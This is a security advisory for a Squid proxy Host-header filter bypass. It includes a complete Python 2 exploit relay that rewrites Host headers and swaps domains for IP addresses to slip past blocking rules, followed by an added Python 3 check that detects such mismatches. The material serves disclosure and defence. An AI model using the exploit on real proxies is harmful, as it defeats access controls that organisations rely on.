Squid Proxy 'host' HTTP header Security Restriction Bypass Vulnerability


Release date: 2012-04-16
Updated on: 2012-04-17

Affected Systems:
Squid Web Proxy Cache 3.1.19
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53024

Squid is an efficient web cache and proxy program. It was initially developed for the Unix platform and has been ported to Linux and most Unix systems; the latest Squid can also run on Windows.

Squid Proxy has a security vulnerability in the implementation of its filter rules, related to how the HTTP Host header is handled. A successful attack allows the attacker to bypass certain security restrictions.

<* Source: Gabriel Menezes Nunes (gab.mnunes@gmail.com) *>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!

Gabriel Menezes Nunes (gab.mnunes@gmail.com) provides the following test methods:

# Python 2 script (print statements, str-based sockets).
import socket, struct, sys, time
from threading import Thread


# The timeOut can be changed if the proxy is slow.
# Tested in GMail, Facebook, Youtube and several blocked sites.
# The proxy gets the Host field of the HTTP header and does not verify anything else.
# It trusts the HTTP header, which can be modified by the attacker.

timeOut = 0.8
isGet = 0
hostNameG = ""
pacoteGet = ""
port = 8080  # Listening port
proxyAddr = "vulnerableProxy.com"  # vulnerable proxy
proxyPort = 8080  # proxy port

def handle(client, globalSock):

    client.settimeout(timeOut)

    global hostNameG

    while 1:

        # Read the client's request until the socket goes quiet.
        dados = ""
        tam = 0
        while 1:
            try:
                dados2 = client.recv(1024)
                tam = tam + len(dados2)
                dados = dados + dados2
            except socket.timeout:
                break

        dd = dados.find("CONNECT")  # if the packet is a CONNECT METHOD
        if dd != -1:
            dd2 = dados.find(":")
            hostName = dados[dd + 8:dd2]

            ipAddr = socket.gethostbyname(hostName)  # changing the method to connect to the ip address, not the dns domain
            pacote = dados
            hostHeader = "Host: " + hostName
            pacote = pacote.replace(hostHeader, "Host: www.uol.com.br")  # changing the host field with a value that is accepted by the proxy
            pacote = pacote.replace(hostName, ipAddr)  # changing domain for ip

            dados = pacote

        getd = dados.find("GET ")
        getd2 = dados.find("//")
        getd3 = dados.find("/", getd2 + 2)
        hostName = dados[getd2 + 2:getd3]

        if getd != -1:
            globalSock.close()
            globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            globalSock.connect((proxyAddr, proxyPort))
            globalSock.settimeout(timeOut)
            getd2 = dados.find("//")
            getd3 = dados.find("/", getd2 + 2)

            hostName = dados[getd2 + 2:getd3]

            # Carry over the client's proxy credentials, if any.
            proxyAuth = ""
            proxyAuthN = dados.find("Proxy-Authorization:")
            if proxyAuthN != -1:
                proxyAuthNN = dados.find("\r\n", proxyAuthN)
                proxyAuth = dados[proxyAuthN:proxyAuthNN]

            ipAddr = socket.gethostbyname(hostName)

            info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n"
            if proxyAuthN != -1:
                info += proxyAuth + "\r\n"

            info += "Host: www.uol.com.br\r\n"

            globalSock.send(info)
            tam = 0
            gdata = ""

            # Drain the proxy's reply to the CONNECT.
            while 1:
                try:
                    gdata2 = globalSock.recv(1024)

                    tam = tam + len(gdata2)
                    gdata = gdata + gdata2

                    if len(gdata2) == 0:
                        break

                except socket.timeout:
                    break

        globalSock.send(dados)
        tam = 0
        gdata = ""

        # Relay the proxy's response back to the client.
        while 1:
            try:
                gdata2 = globalSock.recv(1024)

                if len(gdata2) > 0:
                    client.send(gdata2)

                tam = tam + len(gdata2)
                gdata = gdata + gdata2

                if len(gdata2) == 0:
                    break

            except socket.timeout:
                break


print 'proxy bypass'
print 'by Gabriel Menezes Nunes'
print 'Tested on McAfee Web Gateway 7 and Squid proxy'
sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'attacked Proxy :',
print proxyAddr
print 'listening on ',
print port
sockzao.bind(("", port))

sockzao.listen(6)

while 1:
    print 'waiting for connections'
    client, address = sockzao.accept()
    print 'client connected'
    print address
    globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    globalSock.connect((proxyAddr, proxyPort))
    globalSock.settimeout(timeOut)

    t = Thread(target=handle, args=(client, globalSock,))
    t.start()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Squid
-----
The vendor has not yet provided a patch or upgrade. Users of the software should watch the vendor's homepage for the latest version:

http://www.squid-cache.org
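
Until a fixed version is available, the mismatch this issue relies on can be looked for in traffic reaching the proxy. The following is an added example, not part of the original advisory or of Squid: a Python 3 check that compares the Host header with the host named in the request target. The function names, sample requests and addresses are constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

def _host_only(authority):
    """Lower-case an authority, drop any :port and IPv6 brackets."""
    a = authority.strip().lower()
    if a.startswith("["):
        return a[1:a.find("]")]
    return a.rsplit(":", 1)[0] if ":" in a else a

def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def check_request(raw):
    """Return a reason if Host disagrees with the request target, else None."""
    lines = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return "malformed request line"
    method, target, _version = parts
    hosts = [l.split(":", 1)[1] for l in lines[1:] if l.lower().startswith("host:")]
    if len(hosts) != 1:
        return "missing or duplicate Host header"
    header_host = _host_only(hosts[0])
    if method.upper() == "CONNECT":
        target_host = _host_only(target)
    elif "://" in target:
        target_host = (urlsplit(target).hostname or "").lower()
    else:
        return None  # origin-form target: Host is the only authority present
    if target_host == header_host:
        return None
    if _is_ip(target_host) and not _is_ip(header_host):
        return "IP-literal target with a different Host name"
    return "Host header does not match request target"

# Constructed sample requests (documentation addresses and example domains).
SAMPLES = [
    b"CONNECT 203.0.113.10:80 HTTP/1.1\r\nHost: allowed.example\r\n\r\n",
    b"GET http://blocked.example/ HTTP/1.1\r\nHost: allowed.example\r\n\r\n",
    b"CONNECT mail.example:443 HTTP/1.1\r\nHost: mail.example:443\r\n\r\n",
]

if __name__ == "__main__":
    for req in SAMPLES:
        print(req.split(b"\r\n")[0].decode(), "->", check_request(req))
```

A filter that decides on the Host header alone would accept the first two samples; evaluating access rules against the request target, or rejecting requests where the two disagree, closes that gap.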
